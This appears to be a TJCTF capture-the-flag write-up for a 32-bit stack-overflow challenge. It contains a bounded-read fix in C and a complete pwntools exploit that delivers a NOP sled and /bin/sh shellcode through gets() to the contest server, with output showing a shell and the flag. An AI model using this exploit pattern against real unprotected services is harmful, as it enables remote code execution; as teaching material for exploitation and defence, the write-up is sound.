Rating: 50
My friend keeps talking about Old School RuneScape. He says he made a service to tell you about trees.
I don't know what any of this means but this system sure looks old! It has like zero security features enabled...
nc p1.tjctf.org 8006
Written by KyleForkBomb
Tags: pwn x86 bof remote-shell gets shellcode nop-sled
No mitigations, 32-bit stack overflow, NOP sled, shellcode.
Retro.
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
No mitigations. Choose your own adventure.
Line 10: a gets call, i.e. an unbounded read into local_110. That buffer is large enough to hold shellcode.
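The gets call is the whole bug, and the program-side fix is a bounded read. Added here as an illustration, not the challenge source (which this writeup does not reproduce): a hypothetical hardened reader for the 0x110-byte tree buffer, plus helpers that feed it constructed lines, including one as long as the overflow payload.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TREE_LEN 0x110  /* size of local_110 in the challenge binary, from the listing above */

/* gets() has no bound, so anything past TREE_LEN bytes overwrites the saved return address.
 * Hypothetical hardened reader (not the CTF source): bounded fgets(), newline stripped.
 * Returns the line length, or -1 when the line did not fit (the rest is drained and dropped). */
int read_tree_name(char *dst, size_t cap, FILE *in) {
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) return -1;
    size_t n = strcspn(dst, "\n");
    if (dst[n] == '\n') { dst[n] = '\0'; return (int)n; }
    int c = fgetc(in);                                /* no newline: did the input end, or was it cut? */
    if (c == EOF || c == '\n') return (int)n;         /* fit exactly */
    while ((c = fgetc(in)) != EOF && c != '\n') ;     /* oversized: discard the rest of the line */
    dst[0] = '\0';
    return -1;
}

/* Test helper: run the reader over an in-memory line (standard C via tmpfile()). */
int read_tree_from_string(const char *input, char *dst, size_t cap) {
    FILE *f = tmpfile();
    if (f == NULL) return -2;
    fputs(input, f);
    rewind(f);
    int r = read_tree_name(dst, cap, f);
    fclose(f);
    return r;
}

/* Test helper: a constructed line of line_len 'A' bytes plus newline, the shape of the overflow. */
static char last_tree[TREE_LEN];
int read_constructed_line(size_t line_len) {
    char *line = malloc(line_len + 2);
    if (line == NULL) return -2;
    memset(line, 'A', line_len);
    line[line_len] = '\n';
    line[line_len + 1] = '\0';
    int r = read_tree_from_string(line, last_tree, TREE_LEN);
    free(line);
    return r;
}

int main(void) {
    char tree[TREE_LEN];
    puts("Enter a tree type:");
    if (read_tree_name(tree, sizeof tree, stdin) < 0) { puts("That tree name is too long :("); return 1; }
    printf("I don't have the tree %s :(\n", tree);   /* echo the name, never a stack address */
    return 0;
}
```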
Line 14 leaks a stack address. Even though the challenge server has "like zero security features enabled...", the stack's location still varies from run to run:
I don't have the tree -9332 :(
I don't have the tree -9204 :(
I don't have the tree -9188 :(
I don't have the tree -9220 :(
I don't have the tree -9156 :(
However, the general vicinity does not change much (remotely). local_110 is 0x110 bytes from the return address, per the Ghidra stack offsets:
int EAX:4 <RETURN>
undefined4 Stack[-0x10]:4 local_10
undefined1 Stack[-0x110]:1 local_110
We just need to write 0x110 bytes of padding, the estimated address of the NOP sled (the guessed return-address slot +4, i.e. the next stack slot) as the new return address, the NOP sled itself, some shellcode, and cross our fingers.
#!/usr/bin/python3
from pwn import *
#p = process('./osrs')
p = remote('p1.tjctf.org', 8006)
# Guessed buffer address. Its low 16 bits, 0xdc2b, read as a signed short give -9173,
# the same form as the numbers the server leaks, so the guess sits in the observed range.
buf = 0xffffdc2b # -9173
ret = buf + 0x110  # estimated address of the saved return address
#http://shell-storm.org/shellcode/files/shellcode-851.php
shellcode = b'\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00'
payload = 0x110 * b'A'          # fill local_110 up to the return address
payload += p32(ret + 4)         # new return address: the next stack slot, where the sled starts
payload += 100 * b'\x90'        # NOP sled absorbs the error in the guessed address
payload += shellcode
p.recvuntil(b'Enter a tree type:')
p.sendline(payload)
p.interactive()
Output:
# ./exploit.py
[+] Opening connection to p1.tjctf.org on port 8006: Done
[*] Switching to interactive mode
I don't have the tree -9188 :(
$ cat flag.txt
tjctf{tr33_c0de_in_my_she115}